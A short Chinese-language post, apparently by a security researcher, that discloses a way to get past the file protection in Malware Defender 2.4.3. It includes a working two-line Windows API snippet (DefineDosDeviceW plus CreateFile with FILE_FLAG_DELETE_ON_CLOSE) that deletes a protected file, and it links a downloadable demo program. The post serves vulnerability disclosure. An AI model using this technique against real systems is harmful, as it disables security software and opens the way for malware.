下午Malware Defender更新了2.4.3，根据我的帖子内容更新了驱动，封了FILE_DELETE_ON_CLOSE的常规方式。晚上睡醒了看了一眼更新的程序，新驱动FD保护仍是很弱。随便变换了一下，重新让FILE_DELETE_ON_CLOSE攻击方式起效了

这是第三次发出突破MD文件保护的代码，目前所有的攻击都是针对MD对NtCreateFile钩子的处理，而MD剩下的钩子还有3，40处左右~光是NtCreateFile,目前至少还有5种左右的攻击方式 :)

此方式测试对2.4.3版本有效，同上个测试程序一样，可选择任意MD保护文件删除

示例代码如下：

DefineDosDeviceW(DDD_RAW_TARGET_PATH , L"killmdx" , L“\\??\\c:\\program files\\malware defender\\mdlog.txt");

CreateFile("\\\\.\\killmdx" ,   DELETE ,    0,   0,   OPEN_EXISTING ,   FILE_FLAG_DELETE_ON_CLOSE,0);

测试程序：http://mj0011.ys168.com 漏洞演示目录下 mdvuln_2.rar